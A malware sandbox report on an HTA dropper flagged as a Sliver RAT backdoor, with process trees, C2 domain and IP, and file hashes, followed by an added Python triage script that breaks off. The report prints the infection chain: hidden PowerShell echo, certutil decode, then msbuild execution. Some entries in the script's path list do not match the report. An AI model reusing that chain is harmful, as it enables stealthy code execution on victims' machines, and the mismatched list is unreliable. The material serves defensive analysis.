Malware Analysis Report

2024-11-13 13:23

Sample ID 241107-crt25askhx
Target 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta
SHA256 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
Tags sliver backdoor defense_evasion discovery execution trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10
SHA256 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Threat Level: Known bad

The file 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta was found to be: Known bad.

Malicious Activity Summary

sliver backdoor defense_evasion discovery execution trojan

Sliver family

Sliver RAT v2

SliverRAT

Manipulates Digital Signatures

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Deobfuscate/Decode Files or Information

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-11-07 02:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-11-07 02:19
Reported 2024-11-07 02:21
Platform win7-20240903-en
Max time kernel 118s
Max time network 148s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

Signatures

Sliver RAT v2

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2748 wrote to memory of 2768 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2768 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2768 wrote to memory of 2692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2692 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2872 wrote to memory of 1272 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2692 wrote to memory of 1736 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1736 wrote to memory of 2936 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2692 wrote to memory of 2944 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2944 wrote to memory of 2968 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo 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 > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA27.tmp" "c:\Users\Admin\AppData\Local\Temp\3y1bivfx\CSCC73DE90DF3FE46598A3F4938CE41537B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAE2.tmp" "c:\Users\Admin\AppData\Local\Temp\3chag5h1\CSC473A7D4465454302B63FC1A2A078FC3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2E.tmp" "c:\Users\Admin\AppData\Local\Temp\g1dxskcg\CSC3DDB26D312934F398C30737F68A1486.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 secure.cloudtechnologiesusa.com udp
US 23.239.28.166:8081 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:8080 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp

Files

\??\c:\windows\temp\enc3.txt

C:\windows\temp\d.xml

\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\CSCC73DE90DF3FE46598A3F4938CE41537B.TMP

C:\Users\Admin\AppData\Local\Temp\RESFA27.tmp

C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.dll

C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.pdb

\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\CSC473A7D4465454302B63FC1A2A078FC3.TMP

C:\Users\Admin\AppData\Local\Temp\RESFAE2.tmp

C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.pdb

C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.dll

\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\CSC3DDB26D312934F398C30737F68A1486.TMP

C:\Users\Admin\AppData\Local\Temp\RESA2E.tmp

C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.pdb

C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.dll

Analysis: behavioral2

Detonation Overview

Submitted 2024-11-07 02:19
Reported 2024-11-07 02:21
Platform win10v2004-20241007-en
Max time kernel 148s
Max time network 157s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Sliver RAT v2

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1908 wrote to memory of 3520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3520 wrote to memory of 1424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 3520 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 952 wrote to memory of 3036 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3036 wrote to memory of 4876 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 952 wrote to memory of 2056 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2056 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 952 wrote to memory of 2136 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2136 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo 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 > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA103.tmp" "c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp" "c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP"

Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_damg5dxo.rm5.ps1

\??\c:\windows\temp\enc3.txt

C:\windows\temp\d.xml

\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.0.cs
SHA512 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP

MD5 4799bda01f5880c4a0dee36f67c0be86
SHA1 fe89492a52a776ebaeac29c163023a50058675b6
SHA256 3a1297f629a098ea3771944607932a60502995298531fb312c30a4e8ec9b4cd9
SHA512 4cdc430768375c3b870f3ace8ad3b9c32e53eebe5380213f55e897b679abacd547daee75e0674b5b010defc052577720161ee37fe9031a106a835d35113fe4b9

C:\Users\Admin\AppData\Local\Temp\RESA103.tmp

MD5 4fb06109536fb966fc7fe48a4e4c73c5
SHA1 cb634c5aa3ac6d2b3c6dd35921e4c0e312db3012
SHA256 018a3672621a1507f13dd3b1c0b17ee3c580cd6b4f419d16d307f2023b431e9e
SHA512 dedc4370055f51785c20f07495500f3d4f998f71884c1379a619ab1427f73abca7603b74dc234fbdc273420f177583537060dfd364c1916170f8cc3930a0fab0

C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.dll

MD5 de3baa1652d6817ba41024c8996de901
SHA1 923c8476f795cb27dbfd8cb627fc7b3975a40212
SHA256 f251611b3d76e57616e1f80c7ec49920bbff294bef9006cbde133868d6c64040
SHA512 a03a0a1aa86b6d4162b253664fbe2f185bca424e145ff3fd1963d06c5851bb9448004464f55c4ce55d1163fbe137efc0d1b1b4c19ac84f91be89c2fc09ab67bd

C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.pdb

MD5 57a23f93864adaf79e7eefed41a39ff0
SHA1 5a2250258e1e2f8dbe66ecbfc1b7b753f6bc235b
SHA256 e4b55cfa35a1c121f674ce3b8518f2aead81e7591a137ff288b4f74be7222f0d
SHA512 af5b9867a06367baccbb4fa69825354835d6934b2f929f006444ddb67c06b4e9d84b1aae1dabf83069b9b82502d2c680b4fb87a785c4e0791a723e4e9e0b0e37

memory/952-50-0x00000281A8010000-0x00000281A8018000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline

MD5 93f61be44f885540c24a3ba21fc93054
SHA1 aaf9089f5c09ca69e142fceb092eaa231432ad5e
SHA256 ba1cdc0c60624fea02bc85a952474a69c93a4c408a92fbbd6f46ca076885f681
SHA512 d1685bbecf2e060f3a74db65683d233a71c7851527a766207cf4250425b2a47733b760380e1ad15fcdc05cb0a2be9334cbaceb094bcb9d986d755c49bacb01e4

\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.0.cs

MD5 da1f4b7b1a87cc475dfa05923b6301a0
SHA1 0e2ff764c519bc8169b66437857f01e25676e343
SHA256 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e
SHA512 d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP

MD5 d747f845e0479d73806181e4ffd65502
SHA1 4ea4786d121256d1554fde6b540567a02be26ad8
SHA256 9e38db25e91b461a7191f87c4e1b41ce5266da42f82436669495e0c5e86b40f9
SHA512 57d62fe4501202f31b0ec94d11a40306f40a7ec0c708452d09055c51e6161048a49a63ce080443024a0bfcd7f98d24f7134688a21b1b97b4e4bb2e27c1709a51

C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp

MD5 dd7867673e51ebb41d610f11e45354b7
SHA1 7f800b2b6ea4bc69174d9536db0fe2a3bdaf2906
SHA256 a0dadca789337649ca394bfd993d0e8a49e2c19b4c50d3ffbbb4b7c1a2471a87
SHA512 1da21919dd82c800e6becdec76c15d2d2420312c4656ae2518c6e395563e109dd9079ba49f4344393d87042642c31276e1e8a854663982061baabb470fdd3a9c

C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.pdb

MD5 e82c8d8eb2bfb54e55ece546f457ba30
SHA1 de6962a4c0384a557a45c22acfa341d1cdd05a36
SHA256 cdf9dadd3895b7f874fef2d898b07e5f505a534fdd9084303a9226f0f77b9898
SHA512 5f0efbc794be8b0301363c3b2c30d15aec056d5801ffedfa612a1699d5b2abe0631d86b0a1ce7dd3748bbc9576d1ef7cd919264f1a0de29146f59a7c3f2bbe32

C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.dll

MD5 21fc6aeefeb46ee3fac086ae5ce211a0
SHA1 446d2594ab654a6a7e65b689526467fffe9b8834
SHA256 913e46a90ccc162b187f5104d589dc54c0998a023e12d83b8f2a747e4c456802
SHA512 af678b2b0d975396e488d9a27d4f245c85bafbd1a4653e7203fe00f4fdff0548e9363f863b1c4d1346c62365f6fabe206f8f4f7505dc385b80ec30cf20fe122c

memory/952-66-0x00000281A8020000-0x00000281A8028000-memory.dmp

memory/952-77-0x00000281AA820000-0x00000281AA842000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline

MD5 04c6f1e77ed254f3f584bb7d8b606404
SHA1 b4fa38bbd3dd3b217809864c0828f31355088655
SHA256 8c875cf738bf775fa8e3d1fe21e624d6e856a47bd060b564a73750d4783440db
SHA512 becdded8061fa3893c06fc10a5b02c72beca945dd1b8cdb30c48c82c9bef5a1600f78f33b78ef6e7a0e70647126c13097ab211f9b55000ee287cfa92cb2b6c89

\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP

MD5 c539223eff9f6a5ebbd73f7d4a1dab74
SHA1 a4c1f35cc92829c1c84ce2c22f17a75490353040
SHA256 a3cc88b9d10aa7290a009cfc3a0d70d87a12b129d78432447cbb4a663244932f
SHA512 955bc58410de5762fa2419c4c574648417b4e2e5c0e0aa51ece48501d0f47768f8e45e77a5f62ed32c1619a5c340165c7bff4726c20df8ebe822853c66c0e936

C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp

MD5 047b10848fde47eb76ac13ded734bab4
SHA1 256fcb53bdb0fe874a1c587d68140c9c2fd9497a
SHA256 1b9c0e6949060a80ff379a0e0c58a1b5a959305156a886af3478071f8a662be9
SHA512 ce7e64cd728062e0fe9d780463f4efb6f1ad0cf0938e3ddb976f9147031a3f5df450dc60c89ce6158b85d552b502c278c218af9db4079156b3933a591272cdf9

memory/952-90-0x00000281A8320000-0x00000281A8328000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.dll

MD5 fb0cb1c8d9d20770fe532b409454b79f
SHA1 5bf38c6ba400f4ec1dc0f1b5da959a21cf537c57
SHA256 0e4995b295c2c086fb5a49cadb1448a5dcdf7b8697f97f505a2c0a16665e734f
SHA512 1bae49309ccd0a9f74bd1d8ca939f5cb3ced9c45fe67beaab085c7b13183cabbccd1f88ce8d96f07d17d93e10b53b15b237bd137f130d03a94422df789da798b

memory/3520-92-0x000000007424E000-0x000000007424F000-memory.dmp

memory/3520-93-0x0000000074240000-0x00000000749F0000-memory.dmp

memory/952-95-0x00000281AAA50000-0x00000281AB4CB000-memory.dmp

memory/952-96-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

memory/952-97-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

memory/952-98-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

memory/952-99-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

memory/952-100-0x00000281ABF50000-0x00000281ACA34000-memory.dmp
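The Files list above is raw sandbox output, but it carries a recognisable pattern: three random eight-character subdirectories under the user's Temp (jf22zewm, xfko3qp1, o0ad3aie), each holding a .cmdline, a .0.cs, a CSC*.TMP and a compiled .dll (two also have a .pdb), plus matching RES*.tmp resource files one level up. That set is what PowerShell's Add-Type leaves behind when it hands inline C# to csc.exe, so the PowerShell stage compiled and loaded three assemblies at runtime. Alongside them sit two droppers' working files in C:\Windows\Temp (enc3.txt, d.xml) and the __PSScriptPolicyTest_*.ps1 file PowerShell writes to probe whether an AppLocker/WDAC script policy is enforced. The following script is an added example, not part of the report or of the sandbox's tooling: it triages a Files list like this one, groups the Add-Type compilation artifacts, separates the Windows\Temp drops, and reads the memory/PID-index-start-end naming of the dumps to infer each PID's address width. The 4 GiB address-width heuristic and the REPORT_FILES list (paths copied from this report, hashes omitted) are the example's own constructions.

```python
"""Triage a sandbox 'Files' list for PowerShell Add-Type compile artifacts and temp drops.

Added example for this report; the path list is constructed from the Files section above.
"""
import re
from collections import defaultdict

# Constructed from the report's Files section (hashes omitted, order preserved).
REPORT_FILES = [
    "memory/3520-2-0x000000007424E000-0x000000007424F000-memory.dmp",
    "memory/3520-4-0x0000000074240000-0x00000000749F0000-memory.dmp",
    "memory/3520-22-0x0000000007E00000-0x000000000847A000-memory.dmp",
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_damg5dxo.rm5.ps1",
    r"\??\c:\windows\temp\enc3.txt",
    "memory/952-27-0x000002818DBE0000-0x000002818DC1E000-memory.dmp",
    "memory/952-95-0x00000281AAA50000-0x00000281AB4CB000-memory.dmp",
    r"C:\windows\temp\d.xml",
    r"\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline",
    r"\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.0.cs",
    r"\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP",
    r"C:\Users\Admin\AppData\Local\Temp\RESA103.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.dll",
    r"C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.pdb",
    r"\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline",
    r"\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.0.cs",
    r"\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP",
    r"C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.pdb",
    r"C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.dll",
    r"\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline",
    r"\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.0.cs",
    r"\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP",
    r"C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.dll",
]

# Sandbox dump naming: memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp
MEMDUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
# Add-Type compiles in Temp\<8 random alphanumerics>\<same name>.{cmdline,0.cs,dll,pdb} + CSC*.TMP
ADDTYPE_DIR_RE = re.compile(r"(?i)\\temp\\([a-z0-9]{8})\\([^\\]+)$")
# cvtres output the compiler driver writes next to the compile directory
CVTRES_RE = re.compile(r"(?i)\\temp\\res[0-9a-f]+\.tmp$")


def normalize(path):
    """Strip the NT object-manager prefix the sandbox records (\\??\\) and lowercase."""
    p = path.strip()
    if p.startswith("\\??\\"):
        p = p[4:]
    return p.lower()


def find_addtype_compilations(paths):
    """Group compile artifacts by their random directory; keep sets with a command line and source."""
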